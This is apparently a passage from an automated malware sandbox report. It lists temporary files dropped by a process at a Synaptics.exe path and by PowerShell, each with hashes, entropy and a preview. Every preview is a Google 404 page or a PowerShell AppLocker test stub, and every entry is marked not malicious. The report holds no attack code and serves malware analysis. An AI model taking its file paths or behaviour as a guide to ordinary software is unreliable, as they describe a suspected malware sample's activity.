                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GJDLKo8dHNMbQxZUa0MDJA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\XVOgpVg.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.270152412607049
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0q6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N6+pAZewRDK4mW
                                                                                                                                                                    MD5:8A73A966B9E6EA36E46844287019D6FC
                                                                                                                                                                    SHA1:C5EF521DD2351BE71052616090B33DAD5FD3942E
                                                                                                                                                                    SHA-256:8D9021425C1504812D971AB200B044FB597476A56DFEE81864E6683AE74ECD07
                                                                                                                                                                    SHA-512:F2BAAA0A06026D7B3958D43BB26E15C1A33EAF17BB08C12F24FE8DF93C4357038297F3A4857A550FD4EB4D451FCC9EF33A8576C605EED753D932D942A22DC8E6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Pxg3jzeCd6pVHKjq8tQ7wQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Xic4zkP.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.24202933730775
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+06SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                                                                    MD5:85BDD5EE31575B8BB60117AFBF485388
                                                                                                                                                                    SHA1:589566035790ED119A4AABF35DC1AC9AE8B2C90F
                                                                                                                                                                    SHA-256:D1CA0BA2C962766E720CCF78DA3D4E5E238A84681C5F91CAC281844FD206E9F4
                                                                                                                                                                    SHA-512:4FDF7F58D5287135EFBEADD4ED484AE759547B77D5462FA41A20E0FFBD53F40BCF63771CA847129D895192624CA6E8363FEE7DD50AB2B643C28CEB5B721D5D31
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="timd0CZisH82900btgFh5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\YfITQvC.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.271547037767635
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                                                    MD5:080900B9A775DF6577831D46DE457464
                                                                                                                                                                    SHA1:5834D2563E8B57A24F287272FD1AF42E0D7AFE23
                                                                                                                                                                    SHA-256:4C717D9DBCCF7E67E17120C7019FB9EBCC6565AB8A1F2FD7DBA95E6DBF3E4006
                                                                                                                                                                    SHA-512:DF0C76D64E184E25E47741BCAA1106CAF4924F3FE23C4E256F80D6E538C08E38971F5F86FB809B591841356CB0419594607B51A464345BAA83DC5EFCE7064EE9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P6q9uXgnH5OBFZNA1IwioA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Yl5kB1L.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.261559991799064
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0aSQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bx+pAZewRDK4mW
                                                                                                                                                                    MD5:BB3C6CAE3469F1AC99A0652399146363
                                                                                                                                                                    SHA1:B6FE4A8DF428E64E3AEBE05CAA4CBED91E3402DF
                                                                                                                                                                    SHA-256:25473C5D857DE67C82EAB81779131BDBFB49B5A9EF77F9E1187730E4C5F5158B
                                                                                                                                                                    SHA-512:101B1532FB1EDBBB3514ABA98419060F2786BF7CA36AB913E8843D88580DEB95236D801F148FAFF51652D2E11E04A3E442BF90AE00F4803B53A1EF391CE36FEE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IO07GFsGrQeVT5wI1gktHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3s5nbwfa.r35.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gcdzxwrs.j44.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktprc01x.tsg.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqxpyv3l.35g.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vm1tenuc.tnb.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yh1vfdgo.qqv.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\cmmNnpH.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.256329237252335
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0u3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                                                                    MD5:98402E7B71617DCDE1C3D9E01935F3FB
                                                                                                                                                                    SHA1:76D544BC94ECB696938CC3722CA16953C165D91B
                                                                                                                                                                    SHA-256:E66AB372F76624C288BBB27D1C4F9C5247DE52CADB6B025F07AE5278EBCC3B0C
                                                                                                                                                                    SHA-512:AC81A95B503A873524AAF9ED499441C8AB1F267BDFB2E0A07F68C1530FDA30AA1643AD6CDD56C04786E9F7FA0DF09EE3D702CDFA53FE2770EA64C80CD2DB321E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bnjnf_wGcv9bJopOzGfyYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\dNrV7NQ.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2640487939249345
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                                                                    MD5:BE343E2C7144E67EDF577003F3D6A871
                                                                                                                                                                    SHA1:8EA7A0D9AAB1866D97980A7F5C3D9A19D8B830D2
                                                                                                                                                                    SHA-256:7C6AEDD21E026CF6968967F5A01B1BE31790266D61524307A9DF79E361303390
                                                                                                                                                                    SHA-512:42B0BA29C82A61992A63362510132D73999913131BE10F860EC3C55A53B8D45218CE59FA65381D947BF0E3E51D10FFD74E7C584CAED53B5DD3374B7B4BBAF71F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OYdzE8H5gTWGzbgvRT7Amg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\dWFU1RR.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2684270868677405
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0pESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+QE+pAZewRDK4mW
                                                                                                                                                                    MD5:57D7CC9E9A993AC8E97264B94F350974
                                                                                                                                                                    SHA1:2CE68434AC6D308A499E22AAE4C8037D95EEE79E
                                                                                                                                                                    SHA-256:B9D5E11F4C1C0D209305C9D8E87E0C512D60888021A23C9C4368DC4B029C2B29
                                                                                                                                                                    SHA-512:FFC8DF991DD977214E6104EB686C039BCFE693FC4652E8565A9313773AD2EF83D4CA27D636F94440048B2A0E37874BE4C6AE65FEA687F45E1CD1A821B3AC2E0C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="416aFCHKoNByvXO9nXW5rw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\eDDKdBC.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.259759960662659
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u+pAZewRDK4mW
                                                                                                                                                                    MD5:1C9AE0BB550142B5383D7072EFC015D8
                                                                                                                                                                    SHA1:15621568AF51D75575939C3D4A5705A5E70BD1CE
                                                                                                                                                                    SHA-256:B4FA728B102365B83F15AD2FE85135B2F80405CCEFDB40759013A5EAFEFA5044
                                                                                                                                                                    SHA-512:98B9F7DF537D6660D358E5275B3F609811EE72180647A3C0A087AEB4A302C7222EA615D2174562F48E9F2447A3D77B69CBC95232EB44E6A12BB8089A542912D9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TGz05i4U0NSinMr3N7nHLQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\fcfmp85.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.261912045742189
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0MzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                                                                    MD5:0E985BEF6A2BD61945292AF04BAADA8D
                                                                                                                                                                    SHA1:E3DA893373284946D332FE88AA140ECF92461A3A
                                                                                                                                                                    SHA-256:93DEC8ABA415E134FA71A7EE6E062C084DCD0FA30BF5F3F4B919F6DC8268C7AB
                                                                                                                                                                    SHA-512:05B9D63113CEED194EF5C6F290B69A63E57298F2C42CAB61D5EFA5B509AAFFE0D9A1D35FD5E020CFCEA0AA9235DC3434EEEC7AE462A8389B937470246CF470BD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="avqQDpd0pxkmNWNN4J9dKA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\fmdB8qa.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.278442768390637
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0USU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                                    MD5:07F230705AFE352A46E23095703AE353
                                                                                                                                                                    SHA1:85A9BA16B08020BF1D017A22184A0BD8E0E3C212
                                                                                                                                                                    SHA-256:1F641A581120602F4D8BF05CAB70473C1207FF9E84371DFE1BF915004DA45CD7
                                                                                                                                                                    SHA-512:1CCDE588ABD0BC29CA21875365A520C7757C215626E51D8ADB0429708A721B18198D46C938C70306AF95730BE6E2B9CBB53070654D9FF1DC35B3D4749BA795D2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HGeD3lGCbfZkh6LNJVB1MQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\gcMzPmm.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.268172981776523
                                                                                                                                                                    Encrypted:false
